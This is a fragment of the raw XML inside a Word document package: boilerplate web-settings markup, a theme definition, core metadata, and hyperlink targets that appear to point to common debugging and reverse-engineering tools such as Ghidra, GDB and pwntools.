        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="565267892">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="663316300">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="672417749">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="739909520">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="744686786">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="786658361">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="799885069">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="811335681">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="853495310">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="869222354">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="875235700">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="898519850">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="924922117">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="955603683">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="977614188">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1013920748">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1097335144">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1169784562">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1179198211">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1220018923">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1229073901">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1391881995">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1429427198">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1466393758">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1482580078">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1561985779">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1565794829">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1600987317">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1637448126">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1652711893">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1684436247">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1702978945">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1710762040">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1717776858">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1725594024">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1823043585">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1971201681">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1972591126">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="2011790416">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="201838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tcat.sourceforge.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hidra-sre.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software/gdb/gdb.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lmv9443@ny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allopsled/pwntools" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="theme/theme1.xml"/></Relationships>
</file>

<file path=word/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Metropolitan">
  <a:themeElements>
    <a:clrScheme name="Custom 2">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192D3A"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="13676B"/>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2FAB-7DC8-4537-A911-C8FF1F3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40</Pages>
  <Words>8145</Words>
  <Characters>464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Von Tish</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lindsay Von Tish</cp:lastModifiedBy>
  <cp:revision>17</cp:revision>
  <cp:lastPrinted>2024-03-13T22:30:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-03-10T04:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-03-13T22:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>